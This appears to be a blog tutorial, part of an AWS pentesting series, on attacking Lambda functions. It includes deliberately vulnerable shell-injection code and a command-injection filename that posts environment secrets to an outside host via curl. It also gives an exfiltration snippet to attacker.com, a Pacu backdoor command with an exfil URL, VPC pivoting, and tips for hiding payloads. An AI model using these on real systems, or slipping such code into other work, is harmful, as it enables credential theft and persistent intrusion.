AWS Penetration Testing Part - 4: Security and Pentesting AWS Lambda

March 17, 2025
AWS SecurityPentestingLambda

Security and Pentesting AWS Lambda

AWS Lambda is a serverless compute service that abstracts the infrastructure layer, but its flexibility introduces potential security gaps. In this post, we'll explore practical techniques for pentesting Lambda functions.

๐Ÿงช Setting Up a Vulnerable Lambda Function

You can simulate real world scenarios by:

  • Creating a function named VulnerableFunction
  • Assigning it a permissive IAM role like LambdaRoleForVulnerableFunction
  • Triggering it on S3 uploads via bucket event notifications
1aws lambda create-function --function-name VulnerableFunction ...

Example vulnerable code includes shell execution on uploaded .zip files:

1subprocess.check_output(
2  f'zipinfo /tmp/{object_key} | grep ^- | wc -l',
3  shell=True
4)

๐Ÿ”“ Attacking with Read Access

Use aws lambda list-functions to enumerate functions and inspect:

1aws lambda list-functions --region us-west-2 --profile LambdaReadOnlyTester

Environment variables often contain secrets

1"Environment": {
2  "Variables": {
3      "app_secret": "1234567890"
4  }
5}

Download Lambda code for offline analysis

1aws lambda get-function --function-name VulnerableFunction --region us-west-2

๐Ÿงฌ Event Injection via S3

Upload a file with a command injection filename

1touch 'hello;curl -X POST -d "`env`" 1.1.1.1;.zip'
2aws s3 cp ./hello;curl -X POST -d "`env`" 1.1.1.1;.zip s3://bucket-for-lambda-pentesting  --profile LambdaReadOnlyTester

Listen for credentials on your server

1nc -lvp 80

๐Ÿ” Attacking with Write Access

Privilege Escalation

If you have iam:PassRole, you can attach roles with high privileges

1aws iam list-roles --profile LambdaReadWriteUser

Use boto3 to access EC2 API

1import boto3
2ec2 = boto3.client('ec2')
3print(ec2.describe_instances())

Data Exfiltration

Inject code to exfiltrate sensitive data

1try:
2  from botocore.vendored import requests
3  requests.post("http://attacker.com", json=event)
4except:
5  pass

๐Ÿ” Persistence Techniques

Deploy watchdog Lambda functions triggered by IAM user or Security Group creation. Use lambda__backdoor_new_users in Pacu:

1run lambda__backdoor_new_users --exfil-url http://attacker-server.com/

To clean up

1run lambda__backdoor_new_users --cleanup

๐ŸŒ Pivoting into VPCs

If a Lambda function is launched into a VPC, use it to access internal services:

1try:
2  import requests
3  req = requests.get('http://172.31.32.192')
4  print(req.text)
5except:
6  pass

๐Ÿ” Tips for Stealth

  • Hide your payload deep inside logic or dependencies
  • Avoid obvious calls like curl unless necessary
  • Keep your exfiltration quick and minimal to avoid timeouts
  • Use /tmp for temp files

โ† Previous: Persistence

Next: โ†’ Advanced Services